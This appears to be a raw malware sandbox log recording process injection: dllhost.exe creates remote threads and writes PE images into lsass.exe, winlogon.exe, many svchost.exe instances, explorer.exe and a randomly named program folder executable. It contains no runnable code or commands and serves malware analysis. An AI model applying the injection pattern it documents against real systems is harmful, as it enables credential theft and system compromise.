Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 21F22EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 21F52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 756E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 75712EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C6722EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C6752EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D5462EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D5492EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 448A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 448D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B9BC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B9BF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3A942EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3BA52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0942EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C0992EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\Conhost.exe EIP: E8A52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6102EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D9CC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F4012EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A4742EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A4AE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ACC52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ACD72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 88E02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 71D92EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\Conhost.exe EIP: 91062EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 73E62EBC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2E991720000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 213BDCB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 158709A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 26DB1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2E991720000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 213BDCB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 158709A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 26DB1630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2917C380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22382770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2917C380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1486AD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1486AD70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24BD3CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24BD3CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA73D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD021B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 269B9FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA73D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD021B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 269BA660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22054D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22055340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27C57DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27C57DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A333B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A333B70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F174530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23315740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A9C8540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EC212A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F174530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1876D540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23315740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22CD8950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A9C8540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15104330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EC212A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22308E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1876D540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AB19360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22CD8950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E731800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15104330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A6DD9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22308E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2FA1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AB19360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E731800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 209D2560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FC05190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 209D2560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D6B0FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FC05190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2036E550000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D6B0FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2480FAC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2036E550000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2671A930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C588F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2480FAC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A8857C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2671A930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 174DEDC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C588F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 282A2110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A8857C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DA09D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 174DEDC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 287FBEC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 282A2110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 2537C620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DA09D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29B59750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 287FBEC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20CAB590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 2537C620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29B59750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20CAB590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23014DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21744F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F02ED50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23014DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21744F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1C0F4C90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A50F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19985DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A50F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19985DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 239543A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 292749D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B9C9A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 292749D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B9C9CB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29F0AD90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29F0ADC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C585A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C585A80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BEA4190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BEA41C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 13A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B40000 value starts with: 4D5A
